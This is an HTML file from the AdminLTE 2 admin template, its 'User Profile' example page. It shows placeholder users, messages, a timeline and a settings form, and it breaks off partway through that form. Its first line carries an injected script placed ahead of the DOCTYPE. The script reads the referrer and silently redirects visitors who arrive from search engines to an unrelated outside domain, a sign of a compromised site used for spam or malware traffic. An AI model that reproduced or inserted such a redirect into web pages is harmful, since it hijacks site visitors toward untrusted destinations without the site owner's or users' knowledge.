d:\wwwroot\wuchunhua\thinkphp\public\adminlte\pages\examples\profile.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002: <html>
003: <head>
004:   <meta charset="utf-8">
005:   <meta http-equiv="X-UA-Compatible" content="IE=edge">
006:   <title>AdminLTE 2 | User Profile</title>
007:   <!-- Tell the browser to be responsive to screen width -->
008:   <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
009:   <!-- Bootstrap 3.3.7 -->
010:   <link rel="stylesheet" href="../../bootstrap/css/bootstrap.min.css">
011:   <!-- Font Awesome -->
012:   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.5.0/css/font-awesome.min.css">
013:   <!-- Ionicons -->
014:   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
015:   <!-- Theme style -->
016:   <link rel="stylesheet" href="../../dist/css/AdminLTE.min.css">
017:   <!-- AdminLTE Skins. Choose a skin from the css/skins
018:        folder instead of downloading all of them to reduce the load. -->

019:   <link rel="stylesheet" href="../../dist/css/skins/_all-skins.min.css">
020:
021:   <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
022:   <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
023:   <!--[if lt IE 9]>
024:   <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
025:   <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
026:   <![endif]-->

027:
028:   <!-- Google Font -->
029:   <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
030: </head>
031: <body class="hold-transition skin-blue sidebar-mini">
032: <div class="wrapper">
033:
034:   <header class="main-header">
035:     <!-- Logo -->
036:     <a href="../../index2.html" class="logo">
037:       <!-- mini logo for sidebar mini 50x50 pixels -->
038:       <span class="logo-mini"><b>A</b>LT</span>
039:       <!-- logo for regular state and mobile devices -->
040:       <span class="logo-lg"><b>Admin</b>LTE</span>
041:     </a>
042:     <!-- Header Navbar: style can be found in header.less -->
043:     <nav class="navbar navbar-static-top">
044:       <!-- Sidebar toggle button-->
045:       <a href="#" class="sidebar-toggle" data-toggle="push-menu" role="button">
046:         <span class="sr-only">Toggle navigation</span>
047:         <span class="icon-bar"></span>
048:         <span class="icon-bar"></span>
049:         <span class="icon-bar"></span>
050:       </a>
051:
052:       <div class="navbar-custom-menu">
053:         <ul class="nav navbar-nav">
054:           <!-- Messages: style can be found in dropdown.less-->
055:           <li class="dropdown messages-menu">
056:             <a href="#" class="dropdown-toggle" data-toggle="dropdown">
057:               <i class="fa fa-envelope-o"></i>
058:               <span class="label label-success">4</span>
059:             </a>
060:             <ul class="dropdown-menu">
061:               <li class="header">You have 4 messages</li>
062:               <li>
063:                 <!-- inner menu: contains the actual data -->
064:                 <ul class="menu">
065:                   <li><!-- start message -->
066:                     <a href="#">
067:                       <div class="pull-left">
068:                         <img src="../../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
069:                       </div>
070:                       <h4>
071:                         Support Team
072:                         <small><i class="fa fa-clock-o"></i> 5 mins</small>
073:                       </h4>
074:                       <p>Why not buy a new awesome theme?</p>
075:                     </a>
076:                   </li>
077:                   <!-- end message -->
078:                   <li>
079:                     <a href="#">
080:                       <div class="pull-left">
081:                         <img src="../../dist/img/user3-128x128.jpg" class="img-circle" alt="User Image">
082:                       </div>
083:                       <h4>
084:                         AdminLTE Design Team
085:                         <small><i class="fa fa-clock-o"></i> 2 hours</small>
086:                       </h4>
087:                       <p>Why not buy a new awesome theme?</p>
088:                     </a>
089:                   </li>
090:                   <li>
091:                     <a href="#">
092:                       <div class="pull-left">
093:                         <img src="../../dist/img/user4-128x128.jpg" class="img-circle" alt="User Image">
094:                       </div>
095:                       <h4>
096:                         Developers
097:                         <small><i class="fa fa-clock-o"></i> Today</small>
098:                       </h4>
099:                       <p>Why not buy a new awesome theme?</p>
100:                     </a>
101:                   </li>
102:                   <li>
103:                     <a href="#">
104:                       <div class="pull-left">
105:                         <img src="../../dist/img/user3-128x128.jpg" class="img-circle" alt="User Image">
106:                       </div>
107:                       <h4>
108:                         Sales Department
109:                         <small><i class="fa fa-clock-o"></i> Yesterday</small>
110:                       </h4>
111:                       <p>Why not buy a new awesome theme?</p>
112:                     </a>
113:                   </li>
114:                   <li>
115:                     <a href="#">
116:                       <div class="pull-left">
117:                         <img src="../../dist/img/user4-128x128.jpg" class="img-circle" alt="User Image">
118:                       </div>
119:                       <h4>
120:                         Reviewers
121:                         <small><i class="fa fa-clock-o"></i> 2 days</small>
122:                       </h4>
123:                       <p>Why not buy a new awesome theme?</p>
124:                     </a>
125:                   </li>
126:                 </ul>
127:               </li>
128:               <li class="footer"><a href="#">See All Messages</a></li>
129:             </ul>
130:           </li>
131:           <!-- Notifications: style can be found in dropdown.less -->
132:           <li class="dropdown notifications-menu">
133:             <a href="#" class="dropdown-toggle" data-toggle="dropdown">
134:               <i class="fa fa-bell-o"></i>
135:               <span class="label label-warning">10</span>
136:             </a>
137:             <ul class="dropdown-menu">
138:               <li class="header">You have 10 notifications</li>
139:               <li>
140:                 <!-- inner menu: contains the actual data -->
141:                 <ul class="menu">
142:                   <li>
143:                     <a href="#">
144:                       <i class="fa fa-users text-aqua"></i> 5 new members joined today
145:                     </a>
146:                   </li>
147:                   <li>
148:                     <a href="#">
149:                       <i class="fa fa-warning text-yellow"></i> Very long description here that may not fit into the
150:                       page and may cause design problems
151:                     </a>
152:                   </li>
153:                   <li>
154:                     <a href="#">
155:                       <i class="fa fa-users text-red"></i> 5 new members joined
156:                     </a>
157:                   </li>
158:                   <li>
159:                     <a href="#">
160:                       <i class="fa fa-shopping-cart text-green"></i> 25 sales made
161:                     </a>
162:                   </li>
163:                   <li>
164:                     <a href="#">
165:                       <i class="fa fa-user text-red"></i> You changed your username
166:                     </a>
167:                   </li>
168:                 </ul>
169:               </li>
170:               <li class="footer"><a href="#">View all</a></li>
171:             </ul>
172:           </li>
173:           <!-- Tasks: style can be found in dropdown.less -->
174:           <li class="dropdown tasks-menu">
175:             <a href="#" class="dropdown-toggle" data-toggle="dropdown">
176:               <i class="fa fa-flag-o"></i>
177:               <span class="label label-danger">9</span>
178:             </a>
179:             <ul class="dropdown-menu">
180:               <li class="header">You have 9 tasks</li>
181:               <li>
182:                 <!-- inner menu: contains the actual data -->
183:                 <ul class="menu">
184:                   <li><!-- Task item -->
185:                     <a href="#">
186:                       <h3>
187:                         Design some buttons
188:                         <small class="pull-right">20%</small>
189:                       </h3>
190:                       <div class="progress xs">
191:                         <div class="progress-bar progress-bar-aqua" style="width: 20%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
192:                           <span class="sr-only">20% Complete</span>
193:                         </div>
194:                       </div>
195:                     </a>
196:                   </li>
197:                   <!-- end task item -->
198:                   <li><!-- Task item -->
199:                     <a href="#">
200:                       <h3>
201:                         Create a nice theme
202:                         <small class="pull-right">40%</small>
203:                       </h3>
204:                       <div class="progress xs">
205:                         <div class="progress-bar progress-bar-green" style="width: 40%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
206:                           <span class="sr-only">40% Complete</span>
207:                         </div>
208:                       </div>
209:                     </a>
210:                   </li>
211:                   <!-- end task item -->
212:                   <li><!-- Task item -->
213:                     <a href="#">
214:                       <h3>
215:                         Some task I need to do
216:                         <small class="pull-right">60%</small>
217:                       </h3>
218:                       <div class="progress xs">
219:                         <div class="progress-bar progress-bar-red" style="width: 60%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
220:                           <span class="sr-only">60% Complete</span>
221:                         </div>
222:                       </div>
223:                     </a>
224:                   </li>
225:                   <!-- end task item -->
226:                   <li><!-- Task item -->
227:                     <a href="#">
228:                       <h3>
229:                         Make beautiful transitions
230:                         <small class="pull-right">80%</small>
231:                       </h3>
232:                       <div class="progress xs">
233:                         <div class="progress-bar progress-bar-yellow" style="width: 80%" role="progressbar" aria-valuenow="20" aria-valuemin="0" aria-valuemax="100">
234:                           <span class="sr-only">80% Complete</span>
235:                         </div>
236:                       </div>
237:                     </a>
238:                   </li>
239:                   <!-- end task item -->
240:                 </ul>
241:               </li>
242:               <li class="footer">
243:                 <a href="#">View all tasks</a>
244:               </li>
245:             </ul>
246:           </li>
247:           <!-- User Account: style can be found in dropdown.less -->
248:           <li class="dropdown user user-menu">
249:             <a href="#" class="dropdown-toggle" data-toggle="dropdown">
250:               <img src="../../dist/img/user2-160x160.jpg" class="user-image" alt="User Image">
251:               <span class="hidden-xs">Alexander Pierce</span>
252:             </a>
253:             <ul class="dropdown-menu">
254:               <!-- User image -->
255:               <li class="user-header">
256:                 <img src="../../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
257:
258:                 <p>
259:                   Alexander Pierce - Web Developer
260:                   <small>Member since Nov. 2012</small>
261:                 </p>
262:               </li>
263:               <!-- Menu Body -->
264:               <li class="user-body">
265:                 <div class="row">
266:                   <div class="col-xs-4 text-center">
267:                     <a href="#">Followers</a>
268:                   </div>
269:                   <div class="col-xs-4 text-center">
270:                     <a href="#">Sales</a>
271:                   </div>
272:                   <div class="col-xs-4 text-center">
273:                     <a href="#">Friends</a>
274:                   </div>
275:                 </div>
276:                 <!-- /.row -->
277:               </li>
278:               <!-- Menu Footer-->
279:               <li class="user-footer">
280:                 <div class="pull-left">
281:                   <a href="#" class="btn btn-default btn-flat">Profile</a>
282:                 </div>
283:                 <div class="pull-right">
284:                   <a href="#" class="btn btn-default btn-flat">Sign out</a>
285:                 </div>
286:               </li>
287:             </ul>
288:           </li>
289:           <!-- Control Sidebar Toggle Button -->
290:           <li>
291:             <a href="#" data-toggle="control-sidebar"><i class="fa fa-gears"></i></a>
292:           </li>
293:         </ul>
294:       </div>
295:     </nav>
296:   </header>
297:   <!-- Left side column. contains the logo and sidebar -->
298:   <aside class="main-sidebar">
299:     <!-- sidebar: style can be found in sidebar.less -->
300:     <section class="sidebar">
301:       <!-- Sidebar user panel -->
302:       <div class="user-panel">
303:         <div class="pull-left image">
304:           <img src="../../dist/img/user2-160x160.jpg" class="img-circle" alt="User Image">
305:         </div>
306:         <div class="pull-left info">
307:           <p>Alexander Pierce</p>
308:           <a href="#"><i class="fa fa-circle text-success"></i> Online</a>
309:         </div>
310:       </div>
311:       <!-- search form -->
312:       <form action="#" method="get" class="sidebar-form">
313:         <div class="input-group">
314:           <input type="text" name="q" class="form-control" placeholder="Search...">
315:               <span class="input-group-btn">
316:                 <button type="submit" name="search" id="search-btn" class="btn btn-flat"><i class="fa fa-search"></i>
317:                 </button>
318:               </span>
319:         </div>
320:       </form>
321:       <!-- /.search form -->
322:       <!-- sidebar menu: : style can be found in sidebar.less -->
323:       <ul class="sidebar-menu" data-widget="tree">
324:         <li class="header">MAIN NAVIGATION</li>
325:         <li class="treeview">
326:           <a href="#">
327:             <i class="fa fa-dashboard"></i> <span>Dashboard</span>
328:             <span class="pull-right-container">
329:               <i class="fa fa-angle-left pull-right"></i>
330:             </span>
331:           </a>
332:           <ul class="treeview-menu">
333:             <li><a href="../../index.html"><i class="fa fa-circle-o"></i> Dashboard v1</a></li>
334:             <li><a href="../../index2.html"><i class="fa fa-circle-o"></i> Dashboard v2</a></li>
335:           </ul>
336:         </li>
337:         <li class="treeview">
338:           <a href="#">
339:             <i class="fa fa-files-o"></i>
340:             <span>Layout Options</span>
341:             <span class="pull-right-container">
342:               <span class="label label-primary pull-right">4</span>
343:             </span>
344:           </a>
345:           <ul class="treeview-menu">
346:             <li><a href="../layout/top-nav.html"><i class="fa fa-circle-o"></i> Top Navigation</a></li>
347:             <li><a href="../layout/boxed.html"><i class="fa fa-circle-o"></i> Boxed</a></li>
348:             <li><a href="../layout/fixed.html"><i class="fa fa-circle-o"></i> Fixed</a></li>
349:             <li><a href="../layout/collapsed-sidebar.html"><i class="fa fa-circle-o"></i> Collapsed Sidebar</a></li>
350:           </ul>
351:         </li>
352:         <li>
353:           <a href="../widgets.html">
354:             <i class="fa fa-th"></i> <span>Widgets</span>
355:             <span class="pull-right-container">
356:               <small class="label pull-right bg-green">new</small>
357:             </span>
358:           </a>
359:         </li>
360:         <li class="treeview">
361:           <a href="#">
362:             <i class="fa fa-pie-chart"></i>
363:             <span>Charts</span>
364:             <span class="pull-right-container">
365:               <i class="fa fa-angle-left pull-right"></i>
366:             </span>
367:           </a>
368:           <ul class="treeview-menu">
369:             <li><a href="../charts/chartjs.html"><i class="fa fa-circle-o"></i> ChartJS</a></li>
370:             <li><a href="../charts/morris.html"><i class="fa fa-circle-o"></i> Morris</a></li>
371:             <li><a href="../charts/flot.html"><i class="fa fa-circle-o"></i> Flot</a></li>
372:             <li><a href="../charts/inline.html"><i class="fa fa-circle-o"></i> Inline charts</a></li>
373:           </ul>
374:         </li>
375:         <li class="treeview">
376:           <a href="#">
377:             <i class="fa fa-laptop"></i>
378:             <span>UI Elements</span>
379:             <span class="pull-right-container">
380:               <i class="fa fa-angle-left pull-right"></i>
381:             </span>
382:           </a>
383:           <ul class="treeview-menu">
384:             <li><a href="../UI/general.html"><i class="fa fa-circle-o"></i> General</a></li>
385:             <li><a href="../UI/icons.html"><i class="fa fa-circle-o"></i> Icons</a></li>
386:             <li><a href="../UI/buttons.html"><i class="fa fa-circle-o"></i> Buttons</a></li>
387:             <li><a href="../UI/sliders.html"><i class="fa fa-circle-o"></i> Sliders</a></li>
388:             <li><a href="../UI/timeline.html"><i class="fa fa-circle-o"></i> Timeline</a></li>
389:             <li><a href="../UI/modals.html"><i class="fa fa-circle-o"></i> Modals</a></li>
390:           </ul>
391:         </li>
392:         <li class="treeview">
393:           <a href="#">
394:             <i class="fa fa-edit"></i> <span>Forms</span>
395:             <span class="pull-right-container">
396:               <i class="fa fa-angle-left pull-right"></i>
397:             </span>
398:           </a>
399:           <ul class="treeview-menu">
400:             <li><a href="../forms/general.html"><i class="fa fa-circle-o"></i> General Elements</a></li>
401:             <li><a href="../forms/advanced.html"><i class="fa fa-circle-o"></i> Advanced Elements</a></li>
402:             <li><a href="../forms/editors.html"><i class="fa fa-circle-o"></i> Editors</a></li>
403:           </ul>
404:         </li>
405:         <li class="treeview">
406:           <a href="#">
407:             <i class="fa fa-table"></i> <span>Tables</span>
408:             <span class="pull-right-container">
409:               <i class="fa fa-angle-left pull-right"></i>
410:             </span>
411:           </a>
412:           <ul class="treeview-menu">
413:             <li><a href="../tables/simple.html"><i class="fa fa-circle-o"></i> Simple tables</a></li>
414:             <li><a href="../tables/data.html"><i class="fa fa-circle-o"></i> Data tables</a></li>
415:           </ul>
416:         </li>
417:         <li>
418:           <a href="../calendar.html">
419:             <i class="fa fa-calendar"></i> <span>Calendar</span>
420:             <span class="pull-right-container">
421:               <small class="label pull-right bg-red">3</small>
422:               <small class="label pull-right bg-blue">17</small>
423:             </span>
424:           </a>
425:         </li>
426:         <li>
427:           <a href="../mailbox/mailbox.html">
428:             <i class="fa fa-envelope"></i> <span>Mailbox</span>
429:             <span class="pull-right-container">
430:               <small class="label pull-right bg-yellow">12</small>
431:               <small class="label pull-right bg-green">16</small>
432:               <small class="label pull-right bg-red">5</small>
433:             </span>
434:           </a>
435:         </li>
436:         <li class="treeview active">
437:           <a href="#">
438:             <i class="fa fa-folder"></i> <span>Examples</span>
439:             <span class="pull-right-container">
440:               <i class="fa fa-angle-left pull-right"></i>
441:             </span>
442:           </a>
443:           <ul class="treeview-menu">
444:             <li><a href="invoice.html"><i class="fa fa-circle-o"></i> Invoice</a></li>
445:             <li class="active"><a href="profile.html"><i class="fa fa-circle-o"></i> Profile</a></li>
446:             <li><a href="login.html"><i class="fa fa-circle-o"></i> Login</a></li>
447:             <li><a href="register.html"><i class="fa fa-circle-o"></i> Register</a></li>
448:             <li><a href="lockscreen.html"><i class="fa fa-circle-o"></i> Lockscreen</a></li>
449:             <li><a href="404.html"><i class="fa fa-circle-o"></i> 404 Error</a></li>
450:             <li><a href="500.html"><i class="fa fa-circle-o"></i> 500 Error</a></li>
451:             <li><a href="blank.html"><i class="fa fa-circle-o"></i> Blank Page</a></li>
452:             <li><a href="pace.html"><i class="fa fa-circle-o"></i> Pace Page</a></li>
453:           </ul>
454:         </li>
455:         <li class="treeview">
456:           <a href="#">
457:             <i class="fa fa-share"></i> <span>Multilevel</span>
458:             <span class="pull-right-container">
459:               <i class="fa fa-angle-left pull-right"></i>
460:             </span>
461:           </a>
462:           <ul class="treeview-menu">
463:             <li><a href="#"><i class="fa fa-circle-o"></i> Level One</a></li>
464:             <li class="treeview">
465:               <a href="#"><i class="fa fa-circle-o"></i> Level One
466:                 <span class="pull-right-container">
467:                   <i class="fa fa-angle-left pull-right"></i>
468:                 </span>
469:               </a>
470:               <ul class="treeview-menu">
471:                 <li><a href="#"><i class="fa fa-circle-o"></i> Level Two</a></li>
472:                 <li class="treeview">
473:                   <a href="#"><i class="fa fa-circle-o"></i> Level Two
474:                     <span class="pull-right-container">
475:                       <i class="fa fa-angle-left pull-right"></i>
476:                     </span>
477:                   </a>
478:                   <ul class="treeview-menu">
479:                     <li><a href="#"><i class="fa fa-circle-o"></i> Level Three</a></li>
480:                     <li><a href="#"><i class="fa fa-circle-o"></i> Level Three</a></li>
481:                   </ul>
482:                 </li>
483:               </ul>
484:             </li>
485:             <li><a href="#"><i class="fa fa-circle-o"></i> Level One</a></li>
486:           </ul>
487:         </li>
488:         <li><a href="../../documentation/index.html"><i class="fa fa-book"></i> <span>Documentation</span></a></li>
489:         <li class="header">LABELS</li>
490:         <li><a href="#"><i class="fa fa-circle-o text-red"></i> <span>Important</span></a></li>
491:         <li><a href="#"><i class="fa fa-circle-o text-yellow"></i> <span>Warning</span></a></li>
492:         <li><a href="#"><i class="fa fa-circle-o text-aqua"></i> <span>Information</span></a></li>
493:       </ul>
494:     </section>
495:     <!-- /.sidebar -->
496:   </aside>
497:
498:   <!-- Content Wrapper. Contains page content -->
499:   <div class="content-wrapper">
500:     <!-- Content Header (Page header) -->
501:     <section class="content-header">
502:       <h1>
503:         User Profile
504:       </h1>
505:       <ol class="breadcrumb">
506:         <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
507:         <li><a href="#">Examples</a></li>
508:         <li class="active">User profile</li>
509:       </ol>
510:     </section>
511:
512:     <!-- Main content -->
513:     <section class="content">
514:
515:       <div class="row">
516:         <div class="col-md-3">
517:
518:           <!-- Profile Image -->
519:           <div class="box box-primary">
520:             <div class="box-body box-profile">
521:               <img class="profile-user-img img-responsive img-circle" src="../../dist/img/user4-128x128.jpg" alt="User profile picture">
522:
523:               <h3 class="profile-username text-center">Nina Mcintire</h3>
524:
525:               <p class="text-muted text-center">Software Engineer</p>
526:
527:               <ul class="list-group list-group-unbordered">
528:                 <li class="list-group-item">
529:                   <b>Followers</b> <a class="pull-right">1,322</a>
530:                 </li>
531:                 <li class="list-group-item">
532:                   <b>Following</b> <a class="pull-right">543</a>
533:                 </li>
534:                 <li class="list-group-item">
535:                   <b>Friends</b> <a class="pull-right">13,287</a>
536:                 </li>
537:               </ul>
538:
539:               <a href="#" class="btn btn-primary btn-block"><b>Follow</b></a>
540:             </div>
541:             <!-- /.box-body -->
542:           </div>
543:           <!-- /.box -->
544:
545:           <!-- About Me Box -->
546:           <div class="box box-primary">
547:             <div class="box-header with-border">
548:               <h3 class="box-title">About Me</h3>
549:             </div>
550:             <!-- /.box-header -->
551:             <div class="box-body">
552:               <strong><i class="fa fa-book margin-r-5"></i> Education</strong>
553:
554:               <p class="text-muted">
555:                 B.S. in Computer Science from the University of Tennessee at Knoxville
556:               </p>
557:
558:               <hr>
559:
560:               <strong><i class="fa fa-map-marker margin-r-5"></i> Location</strong>
561:
562:               <p class="text-muted">Malibu, California</p>
563:
564:               <hr>
565:
566:               <strong><i class="fa fa-pencil margin-r-5"></i> Skills</strong>
567:
568:               <p>
569:                 <span class="label label-danger">UI Design</span>
570:                 <span class="label label-success">Coding</span>
571:                 <span class="label label-info">Javascript</span>
572:                 <span class="label label-warning">PHP</span>
573:                 <span class="label label-primary">Node.js</span>
574:               </p>
575:
576:               <hr>
577:
578:               <strong><i class="fa fa-file-text-o margin-r-5"></i> Notes</strong>
579:
580:               <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam fermentum enim neque.</p>
581:             </div>
582:             <!-- /.box-body -->
583:           </div>
584:           <!-- /.box -->
585:         </div>
586:         <!-- /.col -->
587:         <div class="col-md-9">
588:           <div class="nav-tabs-custom">
589:             <ul class="nav nav-tabs">
590:               <li class="active"><a href="#activity" data-toggle="tab">Activity</a></li>
591:               <li><a href="#timeline" data-toggle="tab">Timeline</a></li>
592:               <li><a href="#settings" data-toggle="tab">Settings</a></li>
593:             </ul>
594:             <div class="tab-content">
595:               <div class="active tab-pane" id="activity">
596:                 <!-- Post -->
597:                 <div class="post">
598:                   <div class="user-block">
599:                     <img class="img-circle img-bordered-sm" src="../../dist/img/user1-128x128.jpg" alt="user image">
600:                         <span class="username">
601:                           <a href="#">Jonathan Burke Jr.</a>
602:                           <a href="#" class="pull-right btn-box-tool"><i class="fa fa-times"></i></a>
603:                         </span>
604:                     <span class="description">Shared publicly - 7:30 PM today</span>
605:                   </div>
606:                   <!-- /.user-block -->
607:                   <p>
608:                     Lorem ipsum represents a long-held tradition for designers,
609:                     typographers and the like. Some people hate it and argue for
610:                     its demise, but others ignore the hate as they create awesome
611:                     tools to help create filler text for everyone from bacon lovers
612:                     to Charlie Sheen fans.
613:                   </p>
614:                   <ul class="list-inline">
615:                     <li><a href="#" class="link-black text-sm"><i class="fa fa-share margin-r-5"></i> Share</a></li>
616:                     <li><a href="#" class="link-black text-sm"><i class="fa fa-thumbs-o-up margin-r-5"></i> Like</a>
617:                     </li>
618:                     <li class="pull-right">
619:                       <a href="#" class="link-black text-sm"><i class="fa fa-comments-o margin-r-5"></i> Comments
620:                         (5)</a></li>
621:                   </ul>
622:
623:                   <input class="form-control input-sm" type="text" placeholder="Type a comment">
624:                 </div>
625:                 <!-- /.post -->
626:
627:                 <!-- Post -->
628:                 <div class="post clearfix">
629:                   <div class="user-block">
630:                     <img class="img-circle img-bordered-sm" src="../../dist/img/user7-128x128.jpg" alt="User Image">
631:                         <span class="username">
632:                           <a href="#">Sarah Ross</a>
633:                           <a href="#" class="pull-right btn-box-tool"><i class="fa fa-times"></i></a>
634:                         </span>
635:                     <span class="description">Sent you a message - 3 days ago</span>
636:                   </div>
637:                   <!-- /.user-block -->
638:                   <p>
639:                     Lorem ipsum represents a long-held tradition for designers,
640:                     typographers and the like. Some people hate it and argue for
641:                     its demise, but others ignore the hate as they create awesome
642:                     tools to help create filler text for everyone from bacon lovers
643:                     to Charlie Sheen fans.
644:                   </p>
645:
646:                   <form class="form-horizontal">
647:                     <div class="form-group margin-bottom-none">
648:                       <div class="col-sm-9">
649:                         <input class="form-control input-sm" placeholder="Response">
650:                       </div>
651:                       <div class="col-sm-3">
652:                         <button type="submit" class="btn btn-danger pull-right btn-block btn-sm">Send</button>
653:                       </div>
654:                     </div>
655:                   </form>
656:                 </div>
657:                 <!-- /.post -->
658:
659:                 <!-- Post -->
660:                 <div class="post">
661:                   <div class="user-block">
662:                     <img class="img-circle img-bordered-sm" src="../../dist/img/user6-128x128.jpg" alt="User Image">
663:                         <span class="username">
664:                           <a href="#">Adam Jones</a>
665:                           <a href="#" class="pull-right btn-box-tool"><i class="fa fa-times"></i></a>
666:                         </span>
667:                     <span class="description">Posted 5 photos - 5 days ago</span>
668:                   </div>
669:                   <!-- /.user-block -->
670:                   <div class="row margin-bottom">
671:                     <div class="col-sm-6">
672:                       <img class="img-responsive" src="../../dist/img/photo1.png" alt="Photo">
673:                     </div>
674:                     <!-- /.col -->
675:                     <div class="col-sm-6">
676:                       <div class="row">
677:                         <div class="col-sm-6">
678:                           <img class="img-responsive" src="../../dist/img/photo2.png" alt="Photo">
679:                           <br>
680:                           <img class="img-responsive" src="../../dist/img/photo3.jpg" alt="Photo">
681:                         </div>
682:                         <!-- /.col -->
683:                         <div class="col-sm-6">
684:                           <img class="img-responsive" src="../../dist/img/photo4.jpg" alt="Photo">
685:                           <br>
686:                           <img class="img-responsive" src="../../dist/img/photo1.png" alt="Photo">
687:                         </div>
688:                         <!-- /.col -->
689:                       </div>
690:                       <!-- /.row -->
691:                     </div>
692:                     <!-- /.col -->
693:                   </div>
694:                   <!-- /.row -->
695:
696:                   <ul class="list-inline">
697:                     <li><a href="#" class="link-black text-sm"><i class="fa fa-share margin-r-5"></i> Share</a></li>
698:                     <li><a href="#" class="link-black text-sm"><i class="fa fa-thumbs-o-up margin-r-5"></i> Like</a>
699:                     </li>
700:                     <li class="pull-right">
701:                       <a href="#" class="link-black text-sm"><i class="fa fa-comments-o margin-r-5"></i> Comments
702:                         (5)</a></li>
703:                   </ul>
704:
705:                   <input class="form-control input-sm" type="text" placeholder="Type a comment">
706:                 </div>
707:                 <!-- /.post -->
708:               </div>
709:               <!-- /.tab-pane -->
710:               <div class="tab-pane" id="timeline">
711:                 <!-- The timeline -->
712:                 <ul class="timeline timeline-inverse">
713:                   <!-- timeline time label -->
714:                   <li class="time-label">
715:                         <span class="bg-red">
716:                           10 Feb. 2014
717:                         </span>
718:                   </li>
719:                   <!-- /.timeline-label -->
720:                   <!-- timeline item -->
721:                   <li>
722:                     <i class="fa fa-envelope bg-blue"></i>
723:
724:                     <div class="timeline-item">
725:                       <span class="time"><i class="fa fa-clock-o"></i> 12:05</span>
726:
727:                       <h3 class="timeline-header"><a href="#">Support Team</a> sent you an email</h3>
728:
729:                       <div class="timeline-body">
730:                         Etsy doostang zoodles disqus groupon greplin oooj voxy zoodles,
731:                         weebly ning heekya handango imeem plugg dopplr jibjab, movity
732:                         jajah plickers sifteo edmodo ifttt zimbra. Babblely odeo kaboodle
733:                         quora plaxo ideeli hulu weebly balihoo...
734:                       </div>
735:                       <div class="timeline-footer">
736:                         <a class="btn btn-primary btn-xs">Read more</a>
737:                         <a class="btn btn-danger btn-xs">Delete</a>
738:                       </div>
739:                     </div>
740:                   </li>
741:                   <!-- END timeline item -->
742:                   <!-- timeline item -->
743:                   <li>
744:                     <i class="fa fa-user bg-aqua"></i>
745:
746:                     <div class="timeline-item">
747:                       <span class="time"><i class="fa fa-clock-o"></i> 5 mins ago</span>
748:
749:                       <h3 class="timeline-header no-border"><a href="#">Sarah Young</a> accepted your friend request
750:                       </h3>
751:                     </div>
752:                   </li>
753:                   <!-- END timeline item -->
754:                   <!-- timeline item -->
755:                   <li>
756:                     <i class="fa fa-comments bg-yellow"></i>
757:
758:                     <div class="timeline-item">
759:                       <span class="time"><i class="fa fa-clock-o"></i> 27 mins ago</span>
760:
761:                       <h3 class="timeline-header"><a href="#">Jay White</a> commented on your post</h3>
762:
763:                       <div class="timeline-body">
764:                         Take me to your leader!
765:                         Switzerland is small and neutral!
766:                         We are more like Germany, ambitious and misunderstood!
767:                       </div>
768:                       <div class="timeline-footer">
769:                         <a class="btn btn-warning btn-flat btn-xs">View comment</a>
770:                       </div>
771:                     </div>
772:                   </li>
773:                   <!-- END timeline item -->
774:                   <!-- timeline time label -->
775:                   <li class="time-label">
776:                         <span class="bg-green">
777:                           3 Jan. 2014
778:                         </span>
779:                   </li>
780:                   <!-- /.timeline-label -->
781:                   <!-- timeline item -->
782:                   <li>
783:                     <i class="fa fa-camera bg-purple"></i>
784:
785:                     <div class="timeline-item">
786:                       <span class="time"><i class="fa fa-clock-o"></i> 2 days ago</span>
787:
788:                       <h3 class="timeline-header"><a href="#">Mina Lee</a> uploaded new photos</h3>
789:
790:                       <div class="timeline-body">
791:                         <img src="http://placehold.it/150x100" alt="..." class="margin">
792:                         <img src="http://placehold.it/150x100" alt="..." class="margin">
793:                         <img src="http://placehold.it/150x100" alt="..." class="margin">
794:                         <img src="http://placehold.it/150x100" alt="..." class="margin">
795:                       </div>
796:                     </div>
797:                   </li>
798:                   <!-- END timeline item -->
799:                   <li>
800:                     <i class="fa fa-clock-o bg-gray"></i>
801:                   </li>
802:                 </ul>
803:               </div>
804:               <!-- /.tab-pane -->
805:
806:               <div class="tab-pane" id="settings">
807:                 <form class="form-horizontal">
808:                   <div class="form-group">
809:                     <label for="inputName" class="col-sm-2 control-label">Name</label>
810:
811:                     <div class="col-sm-10">
812:                       <input type="email" class="form-control" id="inputName" placeholder="Name">
813:                     </div>
814:                   </div>
815:                   <div class="form-group">
816:                     <label for="inputEmail" class="col-sm-2 control-label">Email</label>
817:
818:                     <div class="col-sm-10">
819:                       <input type="email" class="form-control" id="inputEmail" placeholder="Email">
820:                     </div>
821:                   </div>
822:                   <div class="form-group">
823:                     <label for="inputName" class="col-sm-2 control-label">Name</label>
824:
825:                     <div class="col-sm-10">
826:                       <input type="text" class="form-control" id="inputName" placeholder="Name">
827:                     </div>
828:                   </div>
829:                   <div class="form-group">
830:                     <label for="inputExperience" class="col-sm-2 control-label">Experience</label>
831:
832:                     <div class="col-sm-10">
833:                       <textarea class="form-control" id="inputExperience" placeholder="Experience"></textarea>
834:                     </div>
835:                   </div>
836:                   <div class="form-group">
837:                     <label for="inputSkills" class="col-sm-2 control-label">Skills</label>
838:
839:                     <div class="col-sm-10">
840:                       <input type="text" class="form-control" id="inputSkills" placeholder="Skills">
841:                     </div>
842:                   </div>
843:                   <div class="form-group">
